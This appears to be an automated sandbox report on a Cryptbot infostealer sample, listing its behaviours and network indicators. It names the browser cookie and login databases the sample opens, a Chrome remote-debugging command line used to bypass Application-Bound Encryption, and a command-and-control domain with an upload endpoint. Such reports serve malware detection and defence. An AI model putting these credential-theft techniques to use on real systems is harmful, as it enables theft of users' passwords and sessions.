Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B3116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 7_2_00B3116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B311A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 7_2_00B311A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B31160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 7_2_00B31160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B313C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 7_2_00B313C9
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2684D0 cpuid 7_2_6C2684D0
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 7.2.service123.exe.6c1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 7580, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1562201 Sample: file.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 6 other signatures 2->60 7 file.exe 4 2->7         started        12 service123.exe 2->12         started        14 service123.exe 2->14         started        process3 dnsIp4 40 fvtekk5pn.top 34.116.198.130, 49704, 49732, 49738 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 7->40 42 127.0.0.1 unknown unknown 7->42 44 home.fvtekk5pn.top 7->44 34 C:\Users\user\...\unmYCIPOHmXNjqOesrEy.dll, PE32 7->34 dropped 36 C:\Users\user\AppData\...\service123.exe, PE32 7->36 dropped 62 Attempt to bypass Chrome Application-Bound Encryption 7->62 64 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 7->66 68 7 other signatures 7->68 16 service123.exe 7->16         started        19 WerFault.exe 19 16 7->19         started        22 chrome.exe 7->22         started        25 schtasks.exe 1 7->25         started        file5 signatures6 process7 dnsIp8 48 Multi AV Scanner detection for dropped file 16->48 50 Found evasive API chain (may stop execution after checking mutex) 16->50 52 Found stalling execution ending in API Sleep call 16->52 32 C:\ProgramData\Microsoft\...\Report.wer, Unicode 19->32 dropped 38 239.255.255.250 unknown Reserved 22->38 27 chrome.exe 22->27         started        30 conhost.exe 25->30         started        file9 signatures10 process11 dnsIp12 46 www.google.com 142.250.181.100, 443, 49752 GOOGLEUS United States 27->46
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
239.255.255.250
 unknown Reserved
unknown unknown false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
www.google.com 142.250.181.100 true
fvtekk5pn.top 34.116.198.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://fvtekk5pn.top/v1/upload.php false
    		high
    http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
      		high